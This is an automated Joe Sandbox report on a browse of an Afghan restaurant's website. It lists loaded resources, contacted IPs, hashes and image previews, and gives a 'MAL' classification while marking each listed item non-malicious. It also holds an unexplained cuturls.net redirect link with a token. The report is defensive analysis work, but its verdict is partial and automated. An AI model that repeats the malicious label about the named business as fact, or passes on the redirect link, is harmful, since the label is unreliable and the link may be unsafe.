                                              https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_new1.jpgtrue
                                                unknown
                                                https://www.afghanhayatrestaurant.com.au/assets/imgs/special-menu-1.jpgtrue
                                                  unknown
                                                  https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-5.jpgtrue
                                                    unknown
                                                    https://www.afghanhayatrestaurant.com.au/assets/imgs/res_menu.jpgtrue
                                                      unknown
                                                      https://www.afghanhayatrestaurant.com.au/assets/imgs/main.jpgtrue
                                                        unknown
                                                        https://www.afghanhayatrestaurant.com.au/assets/imgs/img_recipe_3.jpgtrue
                                                          unknown
                                                          https://www.afghanhayatrestaurant.com.au/assets/vendors/wow/wow.jstrue
                                                            unknown
                                                            https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-10.jpgtrue
                                                              unknown
                                                              https://www.afghanhayatrestaurant.com.au/assets/imgs/img_recipe_7.jpgtrue
                                                                unknown
                                                                https://www.afghanhayatrestaurant.com.au/assets/imgs/cook_breakfast.pngtrue
                                                                  unknown
                                                                  https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_N6.jpgtrue
                                                                    unknown
                                                                    https://www.afghanhayatrestaurant.com.au/assets/imgs/res_menu3.jpgtrue
                                                                      unknown
                                                                      https://www.afghanhayatrestaurant.com.au/gallerytrue
                                                                        unknown
                                                                        https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Chapli_Kabab.pngtrue
                                                                          unknown
                                                                          https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Rice_with_Spinach.pngtrue
                                                                            unknown
                                                                            https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Sekh_Kabab.pngtrue
                                                                              unknown
                                                                              https://www.afghanhayatrestaurant.com.au/assets/imgs/Banner_take_image.pngtrue
                                                                                unknown
                                                                                https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-11.jpgtrue
                                                                                  unknown
                                                                                  https://www.afghanhayatrestaurant.com.au/assets/imgs/Banner_dineMenu_image2.pngtrue
                                                                                    unknown
                                                                                    https://www.afghanhayatrestaurant.com.au/assets/imgs/header_2.jpgtrue
                                                                                      unknown
                                                                                      https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_N5.jpgtrue
                                                                                        unknown
                                                                                        https://www.afghanhayatrestaurant.com.au/assets/imgs/food_menu_beverage.pngtrue
                                                                                          unknown
                                                                                          https://www.afghanhayatrestaurant.com.au/assets/imgs/header_6.jpgtrue
                                                                                            unknown
                                                                                            https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Meat_Ball_Curry.pngtrue
                                                                                              unknown
                                                                                              https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Mixed_Kabab_Skewers.pngtrue
                                                                                                unknown
                                                                                                https://www.afghanhayatrestaurant.com.au/aboutUstrue
                                                                                                  unknown
                                                                                                  https://www.afghanhayatrestaurant.com.au/assets/imgs/img_recipe_8.jpgtrue
                                                                                                    unknown
                                                                                                    https://www.afghanhayatrestaurant.com.au/assets/js/foodhut.jstrue
                                                                                                      unknown
                                                                                                      https://www.afghanhayatrestaurant.com.au/takeawaytrue
                                                                                                        unknown
                                                                                                        https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Borani_Banjan.pngtrue
                                                                                                          unknown
                                                                                                          https://www.afghanhayatrestaurant.com.au/assets/imgs/special-menu-2.jpgtrue
                                                                                                            unknown
                                                                                                            https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Chicken_Korma.pngtrue
                                                                                                              unknown
                                                                                                              https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_new2.jpgtrue
                                                                                                                unknown
                                                                                                                https://www.afghanhayatrestaurant.com.au/assets/imgs/cook_dessert.pngtrue
                                                                                                                  unknown
                                                                                                                  https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-1.jpgtrue
                                                                                                                    unknown
                                                                                                                    https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Potato_Borani.pngtrue
                                                                                                                      unknown
                                                                                                                      https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Mantu.pngtrue
                                                                                                                        unknown
                                                                                                                        https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Chicken_Tikka_Kabab.pngtrue
                                                                                                                          unknown
                                                                                                                          https://www.afghanhayatrestaurant.com.au/assets/imgs/featured-image-01.jpgtrue
                                                                                                                            unknown
                                                                                                                            https://www.afghanhayatrestaurant.com.au/assets/imgs/img_recipe_4.jpgtrue
                                                                                                                              unknown
                                                                                                                              https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-6.jpgtrue
                                                                                                                                unknown
                                                                                                                                https://www.afghanhayatrestaurant.com.au/assets/imgs/Banner_index_image.pngtrue
                                                                                                                                  unknown
                                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                  http://afghanhayatrestaurant.com.au/chromecache_233.2.drfalseunknown
                                                                                                                                  http://g.co/dev/maps-no-accountchromecache_436.2.dr, chromecache_280.2.dr, chromecache_464.2.dr, chromecache_365.2.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/chromecache_454.2.dr, chromecache_423.2.drfalseunknown
                                                                                                                                  https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabledchromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespacechromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://github.com/twbs/bootstrap/graphs/contributors)chromecache_387.2.dr, chromecache_256.2.drfalseunknown
                                                                                                                                  https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anonchromecache_454.2.dr, chromecache_423.2.drfalseunknown
                                                                                                                                  https://bugzilla.mozilla.org/show_bug.cgi?id=687787chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://goo.gle/js-api-loadingchromecache_436.2.dr, chromecache_280.2.dr, chromecache_464.2.dr, chromecache_365.2.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://bugs.chromium.org/p/chromium/issues/detail?id=470258chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://search.google.com/local/reviews?placeid=ChIJQ9hSrAkU1moRYsmMbfjyFbIchromecache_233.2.drfalse
                                                                                                                                    unknown
                                                                                                                                    https://developers.google.com/maps/documentation/javascript/styling#cloud_toolingchromecache_365.2.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://support.google.com/fusiontables/answer/9185417).chromecache_436.2.dr, chromecache_280.2.dr, chromecache_464.2.dr, chromecache_365.2.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://developers.google.com/maps/deprecationschromecache_436.2.dr, chromecache_280.2.dr, chromecache_464.2.dr, chromecache_365.2.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://html.spec.whatwg.org/#nonce-attributeschromecache_454.2.dr, chromecache_423.2.drfalseunknown
                                                                                                                                    https://jsperf.com/getall-vs-sizzle/2chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://jquery.com/chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_256.2.drfalseunknown
                                                                                                                                    https://developers.google.com/maps/documentation/javascript/advanced-markers/migrationchromecache_436.2.dr, chromecache_280.2.dr, chromecache_464.2.dr, chromecache_365.2.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://bugs.jquery.com/ticket/4833chromecache_454.2.dr, chromecache_423.2.drfalseunknown
                                                                                                                                    https://sizzlejs.com/chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://bugs.jquery.com/ticket/12359chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://github.com/FezVrasta/popper.js/pull/715chromecache_387.2.dr, chromecache_256.2.drfalseunknown
                                                                                                                                    https://developers.google.com/maps/documentation/javascript/error-messages#unsupported-browserschromecache_365.2.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://cipa.jp/exif/1.0/chromecache_223.2.dr, chromecache_375.2.dr, chromecache_313.2.dr, chromecache_393.2.dr, chromecache_269.2.dr, chromecache_347.2.dr, chromecache_415.2.dr, chromecache_293.2.dr, chromecache_264.2.dr, chromecache_410.2.dr, chromecache_402.2.dr, chromecache_265.2.dr, chromecache_465.2.dr, chromecache_287.2.dr, chromecache_228.2.dr, chromecache_216.2.dr, chromecache_467.2.dr, chromecache_240.2.dr, chromecache_326.2.dr, chromecache_422.2.dr, chromecache_447.2.drfalse
                                                                                                                                      unknown
                                                                                                                                      https://cuturls.net/eWD0j3?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6chromecache_250.2.drfalse
                                                                                                                                        unknown
                                                                                                                                        https://developers.google.com/maps/documentation/javascript/librarieschromecache_436.2.dr, chromecache_280.2.dr, chromecache_464.2.dr, chromecache_365.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://github.com/jquery/jquery/pull/557)chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                          unknown
                                                                                                                                          https://bugs.chromium.org/p/chromium/issues/detail?id=378607chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://daneden.me/animatechromecache_368.2.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://developers.google.com/maps/documentation/javascript/webgl/supportchromecache_227.2.dr, chromecache_319.2.drfalse
                                                                                                                                            unknown
                                                                                                                                            http://getbootstrap.com/javascript/#affixchromecache_428.2.dr, chromecache_335.2.drfalse
                                                                                                                                              unknown
                                                                                                                                              https://drafts.csswg.org/cssom/#resolved-valueschromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://bugs.chromium.org/p/chromium/issues/detail?id=589347chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://www.google.com/maps/embed?pb=chromecache_320.2.drfalse
                                                                                                                                                unknown
                                                                                                                                                https://developers.google.com/maps/documentation/javascript/error-messages#chromecache_252.2.dr, chromecache_257.2.dr, chromecache_314.2.dr, chromecache_373.2.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://html.spec.whatwg.org/multipage/syntax.html#attributes-2chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://promisesaplus.com/#point-59chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://promisesaplus.com/#point-57chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://github.com/eslint/eslint/issues/3229chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://getbootstrap.com/)chromecache_387.2.dr, chromecache_256.2.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://promisesaplus.com/#point-54chromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://goo.gl/pxwQGp)chromecache_387.2.dr, chromecache_256.2.drfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://html.spec.whatwg.org/multipage/scripting.html#selector-disabledchromecache_454.2.dr, chromecache_423.2.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    142.250.186.68
                                                                                                                                                    www.google.comUnited States
                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                    162.210.196.168
                                                                                                                                                    cuturls.netUnited States
                                                                                                                                                    30633LEASEWEB-USA-WDCUSfalse
                                                                                                                                                    162.0.209.239
                                                                                                                                                    afghanhayatrestaurant.com.auCanada
                                                                                                                                                    35893ACPCAfalse
                                                                                                                                                    69.162.95.4
                                                                                                                                                    unknownUnited States
                                                                                                                                                    46475LIMESTONENETWORKSUSfalse
                                                                                                                                                    3.33.243.145
                                                                                                                                                    www10.smartname.comUnited States
                                                                                                                                                    8987AMAZONEXPANSIONGBfalse
                                                                                                                                                    239.255.255.250
                                                                                                                                                    unknownReserved
                                                                                                                                                    unknownunknownfalse
                                                                                                                                                    142.250.186.164
                                                                                                                                                    unknownUnited States
                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                    IP
                                                                                                                                                    192.168.2.4
                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                    Analysis ID:1523123
                                                                                                                                                    Start date and time:2024-10-01 06:25:25 +02:00
                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 4m 6s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:browseurl.jbs
                                                                                                                                                    Sample URL:https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                    Number of analysed new started processes analysed:8
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal48.win@23/394@16/8
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Browse: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    • Browse: https://www.afghanhayatrestaurant.com.au/hoursAndLocation
                                                                                                                                                    • Browse: https://www.afghanhayatrestaurant.com.au/takeaway
                                                                                                                                                    • Browse: https://www.afghanhayatrestaurant.com.au/gallery
                                                                                                                                                    • Browse: https://www.afghanhayatrestaurant.com.au/aboutUs
                                                                                                                                                    • Browse: https://www.afghanhayatrestaurant.com.au/contactUs
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 142.250.186.35, 142.250.110.84, 172.217.18.110, 34.104.35.123, 142.250.185.138, 216.58.212.131, 142.250.184.234, 142.250.185.234, 142.250.185.202, 142.250.184.202, 142.250.181.234, 142.250.74.202, 216.58.206.74, 172.217.16.202, 142.250.186.138, 142.250.186.42, 216.58.206.42, 142.250.186.74, 142.250.186.106, 172.217.18.10, 172.217.16.138, 142.250.186.170, 142.250.185.74, 142.250.185.170, 142.250.185.106, 172.217.23.106, 172.217.18.106, 4.245.163.56, 199.232.214.172, 192.229.221.95, 13.85.23.206, 20.242.39.171, 216.58.206.35, 142.250.185.131, 216.58.212.138, 93.184.221.240, 216.58.212.170
                                                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, maps.googleapis.com, clients2.google.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, update.googleapis.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com, maps.gstatic.com
                                                                                                                                                    • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                    No simulations
                                                                                                                                                    InputOutput
                                                                                                                                                    URL: https://www.afghanhayatrestaurant.com.au/ Model: jbxai
                                                                                                                                                    {
                                                                                                                                                    "brand":["Afghan Hayat Restaurant"],
                                                                                                                                                    "contains_trigger_text":false,
                                                                                                                                                    "trigger_text":"",
                                                                                                                                                    "prominent_button_name":"unknown",
                                                                                                                                                    "text_input_field_labels":"unknown",
                                                                                                                                                    "pdf_icon_visible":false,
                                                                                                                                                    "has_visible_captcha":false,
                                                                                                                                                    "has_urgent_text":false,
                                                                                                                                                    "has_visible_qrcode":false}
                                                                                                                                                    URL: https://www.afghanhayatrestaurant.com.au/dineInMenu Model: jbxai
                                                                                                                                                    {
                                                                                                                                                    "brand":["AFGHAN HAYAT"],
                                                                                                                                                    "contains_trigger_text":false,
                                                                                                                                                    "trigger_text":"",
                                                                                                                                                    "prominent_button_name":"unknown",
                                                                                                                                                    "text_input_field_labels":"unknown",
                                                                                                                                                    "pdf_icon_visible":false,
                                                                                                                                                    "has_visible_captcha":false,
                                                                                                                                                    "has_urgent_text":false,
                                                                                                                                                    "has_visible_qrcode":false}
                                                                                                                                                    URL: https://www.afghanhayatrestaurant.com.au/gallery Model: jbxai
                                                                                                                                                    {
                                                                                                                                                    "brand":["Afghan Hayat Restaurant"],
                                                                                                                                                    "contains_trigger_text":false,
                                                                                                                                                    "trigger_text":"",
                                                                                                                                                    "prominent_button_name":"unknown",
                                                                                                                                                    "text_input_field_labels":"unknown",
                                                                                                                                                    "pdf_icon_visible":false,
                                                                                                                                                    "has_visible_captcha":false,
                                                                                                                                                    "has_urgent_text":false,
                                                                                                                                                    "has_visible_qrcode":false}
                                                                                                                                                    URL: https://www.afghanhayatrestaurant.com.au/aboutUs Model: jbxai
                                                                                                                                                    {
                                                                                                                                                    "brand":["Afghan Hayat Restaurant"],
                                                                                                                                                    "contains_trigger_text":false,
                                                                                                                                                    "trigger_text":"",
                                                                                                                                                    "prominent_button_name":"unknown",
                                                                                                                                                    "text_input_field_labels":"unknown",
                                                                                                                                                    "pdf_icon_visible":false,
                                                                                                                                                    "has_visible_captcha":false,
                                                                                                                                                    "has_urgent_text":false,
                                                                                                                                                    "has_visible_qrcode":false}
                                                                                                                                                    URL: https://www.afghanhayatrestaurant.com.au/hoursAndLocation Model: jbxai
                                                                                                                                                    {
                                                                                                                                                    "brand":["AFGHAN HAYAT"],
                                                                                                                                                    "contains_trigger_text":false,
                                                                                                                                                    "trigger_text":"",
                                                                                                                                                    "prominent_button_name":"unknown",
                                                                                                                                                    "text_input_field_labels":"unknown",
                                                                                                                                                    "pdf_icon_visible":false,
                                                                                                                                                    "has_visible_captcha":false,
                                                                                                                                                    "has_urgent_text":false,
                                                                                                                                                    "has_visible_qrcode":false}
                                                                                                                                                    URL: https://www.afghanhayatrestaurant.com.au/takeaway Model: jbxai
                                                                                                                                                    {
                                                                                                                                                    "brand":["AFGHAN HAYAT"],
                                                                                                                                                    "contains_trigger_text":false,
                                                                                                                                                    "trigger_text":"",
                                                                                                                                                    "prominent_button_name":"unknown",
                                                                                                                                                    "text_input_field_labels":"unknown",
                                                                                                                                                    "pdf_icon_visible":false,
                                                                                                                                                    "has_visible_captcha":false,
                                                                                                                                                    "has_urgent_text":false,
                                                                                                                                                    "has_visible_qrcode":false}
                                                                                                                                                    URL: https://www.afghanhayatrestaurant.com.au/contactUs Model: jbxai
                                                                                                                                                    {
                                                                                                                                                    "brand":["Afghan Hayat Restaurant"],
                                                                                                                                                    "contains_trigger_text":false,
                                                                                                                                                    "trigger_text":"",
                                                                                                                                                    "prominent_button_name":"unknown",
                                                                                                                                                    "text_input_field_labels":"unknown",
                                                                                                                                                    "pdf_icon_visible":false,
                                                                                                                                                    "has_visible_captcha":false,
                                                                                                                                                    "has_urgent_text":false,
                                                                                                                                                    "has_visible_qrcode":false}
                                                                                                                                                    No context
                                                                                                                                                    No context
                                                                                                                                                    No context
                                                                                                                                                    No context
                                                                                                                                                    No context
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 55 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):17617
                                                                                                                                                    Entropy (8bit):2.9332741332067678
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:gSdb8kEWmfaSxNX7sc5roxe5h7jw56PEnE/ljO3M:gSKk6CQqwX7jwvE9q8
                                                                                                                                                    MD5:33136EBB2D613ACC9B3C38A577ADA93E
                                                                                                                                                    SHA1:7C654E799D7180560356C18F61CDBFC759F929AF
                                                                                                                                                    SHA-256:6329769EE71E1425816FCB9DECF54D130CB8F0728EE501623C521C2470A2D826
                                                                                                                                                    SHA-512:F1395036BD9D9BAF60BC0F8AB76BD222B52E6BF064F5CA0A880CCEA30AC473D54882ADF9DC29F5612D0D3658AEB646A9E032EB82AB0C4602B53863F6064653B1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...7...@........?....pHYs...............;jiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2022-07-17T17:42:20+05:30</xmp:CreateDate>. <
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1536, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=2048], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):195545
                                                                                                                                                    Entropy (8bit):7.963667850553197
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:h+V8TY+V8TzM9PE0eBsXZoMwhHgQAA9ZTxAcBDydWDc7RlNBxsZFmt:Z4o9PE0uksAQAA9dxpDyMDkBaMt
                                                                                                                                                    MD5:E60BC027D4C3AF868AB7B1EBC26D60AE
                                                                                                                                                    SHA1:34A455E24E4742C7F93EDD07A219E1C86BB1FBE8
                                                                                                                                                    SHA-256:EDF90A664B4EBDF361518B58B6256956C4F46026559495902BAEB9A817284D36
                                                                                                                                                    SHA-512:4FD75CAF53078035B3B5B23A835BED2FF606D374C7E31373F9A158F00F770BDD0CA073B69CB595E5A22F933544A321957396D35DC0010245728E368AC18B79FD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-5.jpg
                                                                                                                                                    Preview:....*.Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:22 19:41:33.............0221...................................................................r...........z.(................................(........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..&.z......X....e.8lu~..v...U...p.Hs......QmX..1...k..[..O..h..{...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 86 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):37654
                                                                                                                                                    Entropy (8bit):5.914318934454717
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:750wHdDizkH5KU5tKLCmnWWxDns8W8QSAWeEJKIzYnp/fo7oTKVJluHUZI:N5dDizvU50pW+I4AXIzaVo7VS0ZI
                                                                                                                                                    MD5:814D0B866706CF37BB0B7C1449AFBA4A
                                                                                                                                                    SHA1:6F7359220ECACA0873E9F9F5310D836EA2D0478A
                                                                                                                                                    SHA-256:8C5DD61F889ACD11490099DF2EE7DC89B883674744101C8AB27AF165881ED7BE
                                                                                                                                                    SHA-512:44700B93959AC17F2675E18D24A889E72580FCB28A9C91053E6AB608A93E9A4EC7BE4252828BD64F68DF87C64D4C5D9A4043CA0347E777C11C7A71D6FA9037F9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Mantu.png
                                                                                                                                                    Preview:.PNG........IHDR...V...K.......p.....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1150
                                                                                                                                                    Entropy (8bit):2.8302465059791353
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:RHEPriBSauX30Qql5Ei66m7nuXIg8JrHdNNtfkAfTRp6qn:SrijO30tQ96mSX18ZnMWX
                                                                                                                                                    MD5:B26017C39D320E413D59F41B638EB3C3
                                                                                                                                                    SHA1:C7320A39A8DF87DE8C60B2F9EEF1AAA8D590110F
                                                                                                                                                    SHA-256:3484C0506129D56DABE6A97E90407C312705D423068F0F6BD647D394C3526B61
                                                                                                                                                    SHA-512:F3DDE228C18D0F9402C992F1A3A360605D171FA13702B3C456C306236906A063085DE00899F9E61D175CAB138F97E303F97A7E90614BE5FC874E366D55160631
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
